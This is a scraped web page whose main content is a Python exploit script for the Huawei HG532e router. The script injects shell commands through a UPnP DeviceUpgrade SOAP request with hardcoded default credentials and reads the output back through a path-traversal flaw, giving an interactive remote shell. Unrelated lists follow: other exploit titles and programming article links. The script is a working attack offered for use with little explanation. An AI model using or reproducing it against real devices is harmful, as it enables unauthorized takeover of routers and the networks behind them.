#!/bin/python

'''

    Author : Rebellion

    Github : @rebe11ion

    Twitter : @rebellion

'''

import urllib2,requests,os,sys

from requests.auth import HTTPDigestAuth

DEFAULT_HEADERS = {"User-Agent": "Mozilla", }

DEFAULT_TIMEOUT = 5

def fetch_url(url):

    global DEFAULT_HEADERS, DEFAULT_TIMEOUT

    request = urllib2.Request(url, headers=DEFAULT_HEADERS)

    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()

    return data

def exploit(ip, path):

    url = "http://%s:37215/icon/../../../%s" % (ip, path)

    data = fetch_url(url)

    return data

def main():

    pwd = "/"

    cmd_path = "/tmp/ccmd"

    pwd_path = "/tmp/cpwd"

    while True:

       targetip = sys.argv[1]

       cmd_ = raw_input("[{}]$ ".format(pwd))

       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)

       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"

       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)

       assert cmd_path.startswith("/"), "An absolute path is required"

       data = exploit(targetip, cmd_path)

       open(cmd_path,"wb").write(data)

       if "cd" in cmd_:

          pass

       elif "clear" in cmd_:

          os.system("clear")

       elif "cat" in cmd_:

          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))

       else:

          if "|" in cmd_:

             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))

          else:

             os.system("cat {}".format(cmd_path))

       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":

    main()

[EXP]Huawei Router HG532e - Command Execution的更多相关文章

  1. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  7. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  8. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  9. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

随机推荐

  1. cast

    https://blog.csdn.net/seabeam/article/details/47841539 在UVM中经常可以看到$cast的身影,这是SV的build-in task之一,当然它还 ...

  2. centos部署redis主从

    安装环境 CentOS 6.5 .CentOS 7.4 主Redis:10.159.44.175 从Redis: 10.159.44.176.10.159.44.177 Redis下载和安装 在3台机 ...

  3. Python开发【第七篇】:面向对象二

    字段 class Foo:     #静态字段(保存在类中)     CC = 123       def __init__(self):         #普通字段(保存在对象中)          ...

  4. 89. Gray Code返回位运算的所有生成值

    [抄题]: The gray code is a binary numeral system where two successive values differ in only one bit. G ...

  5. [leetcode]11. Container With Most Water存水最多的容器

    Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). ...

  6. Python开发——数据结构【深浅拷贝】

    浅拷贝 # 浅拷贝只copy一层 s = [3,'Lucy',4,[1,2]] s1 = s.copy() 深拷贝 # 深拷贝——克隆一分 import copy s = [3,'Lucy',4,[1 ...

  7. C++中的仿函数

    仿函数:实质就是重载了小括号(),通过类,定义一个对象,对象可以被实例化,具有内存可以存储数据,把需要比较的数据事先给到类对象的成员,这样在比较两个值的时候,可以只传入需要被比较的值即可.因为比较的值 ...

  8. 深入理解JVM(四)JVM性能监控与故障处理工具

    4.2 JVM命令行工具 1.jps(JVM Process Status Tool):JVM进程查看工具,命令行进入到jdk的bin目录下,使用命令:jps -l/-q/-v/-m 2.jstat( ...

  9. Python 多进程编程之 进程间的通信(Queue)

    Python 多进程编程之 进程间的通信(Queue) 1,进程间通信Process有时是需要通信的,操作系统提供了很多机制来实现进程之间的通信,而Queue就是其中的一个方法----这是操作系统开辟 ...

  10. Note | 学术论文写作方法和技巧

    目录 1. 论文发表流程 2. 确定科研方向 3. 思考问题和解决问题 4. 审稿 5. 论文写作 5.1. 标题 5.2. 摘要 5.3.介绍 5.4. 相关工作 5.5. 段落 5.6. 方法 5 ...